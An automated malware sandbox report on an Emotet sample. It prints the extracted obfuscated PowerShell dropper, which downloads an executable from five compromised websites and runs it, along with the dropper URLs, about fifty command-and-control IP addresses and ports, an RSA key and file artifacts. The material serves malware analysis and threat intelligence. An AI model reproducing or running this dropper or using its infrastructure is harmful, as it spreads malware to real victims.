3bd57e5d19f2bad873360a00d5fb1f848945f1fbcdcdc1bea3d94c0edc4a0998

General
Target

3bd57e5d19f2bad873360a00d5fb1f848945f1fbcdcdc1bea3d94c0edc4a0998

Filesize

N/A

Completed

14-01-2020 23:25

Score
10 /10
SHA256

3bd57e5d19f2bad873360a00d5fb1f848945f1fbcdcdc1bea3d94c0edc4a0998

Malware Config

Extracted

Language ps1
Source $Wzrmalxuxq='Qlfchbtowq';$Quonirlij = '200';$Aoligwsevre='Ucdpooeixccoe';$Ebiendllvobj=$env:userprofile+'\'+$Quonirlij+'.exe';$Pmfunxawmmq='Ivubiigrkhbq';$Dfrtqyjmv=.('new'+'-objec'+'t') NET.WeBCLiENt;$Rupvmuvyjos='http://farsmix.com/wp-admin/xpk881/*http://thuong.bidiworks.com/wp-content/q2TO1988/*https://securiteordi.com/wofk253jeksed/QO485/*http://ziyinshedege.com/wp-content/TIGc/*http://luilao.com/yakattack/EmXdYs3Rf/'."sPl`it"('*');$Dmiucocoi='Gaufrcyulz';foreach($Qgckujoct in $Rupvmuvyjos){try{$Dfrtqyjmv."doWnLo`AD`FILe"($Qgckujoct, $Ebiendllvobj);$Bfvbxeeee='Xkdsngqtnjr';If ((&('Get-I'+'tem') $Ebiendllvobj)."lENG`Th" -ge 21347) {[Diagnostics.Process]::"St`Art"($Ebiendllvobj);$Mtfdvohceh='Mejegftkx';break;$Kkougnyjdop='Zbiyjufvdg'}}catch{}}$Jiclhxoqfv='Uaofyltws'
URLs
exe.dropper

http://farsmix.com/wp-admin/xpk881/

exe.dropper

http://thuong.bidiworks.com/wp-content/q2TO1988/

exe.dropper

https://securiteordi.com/wofk253jeksed/QO485/

exe.dropper

http://ziyinshedege.com/wp-content/TIGc/

exe.dropper

http://luilao.com/yakattack/EmXdYs3Rf/

Extracted

Family emotet
C2

70.184.69.146:80

186.177.165.196:443

139.47.135.215:80

192.241.143.52:8080

159.65.241.220:8080

45.79.95.107:443

69.163.33.84:8080

177.34.142.163:80

200.123.183.137:443

2.47.112.72:80

190.17.44.48:80

187.54.225.76:80

190.219.149.236:80

190.100.153.162:443

58.171.38.26:80

91.205.215.57:7080

152.231.89.226:80

94.176.234.118:443

201.213.100.141:8080

203.25.159.3:8080

110.142.161.90:443

46.101.212.195:8080

178.79.163.131:8080

151.80.142.33:80

79.7.158.208:80

191.183.21.190:80

188.216.24.204:80

113.190.254.245:80

87.106.46.107:8080

120.150.247.164:80

80.11.158.65:8080

203.130.0.69:80

50.28.51.143:8080

129.205.201.163:80

149.62.173.247:8080

177.242.21.126:80

200.45.187.90:80

77.55.211.77:8080

190.210.236.139:80

202.62.39.111:80

138.68.106.4:7080

2.45.112.134:80

83.165.78.227:80

76.69.26.71:80

207.154.204.40:8080

212.71.237.140:8080

58.162.218.151:80

189.201.197.98:8080

68.187.160.28:443

190.151.5.130:443

rsa_pubkey.plain
-----BEGIN PUBLIC KEY----- MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOmlscqbEIhLjVsj9r3eYacKi6C+Qrua j5TlU+pn3zc0k06qCoahFXBBGnYMotHQc6OwfBKwHWm831LIVg29kEjT8UYxnN5v fzNGgqXTe25QARf78CsQqqN/ImKdXo+GFwIDAQAB -----END PUBLIC KEY-----
Signatures

Filter: None

    Processes
    Network
    Replay Monitor
    00:00 00:00
    Downloads
    • C:\Users\Admin\200.exe

    • C:\Users\Admin\200.exe

    • C:\Users\Admin\200.exe

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438

    • memory/4484-9-0x0000000000620000-0x0000000000637000-memory.dmp

    • memory/4484-10-0x0000000000400000-0x000000000046E000-memory.dmp

    • memory/4528-6-0x00000000021E0000-0x00000000021F7000-memory.dmp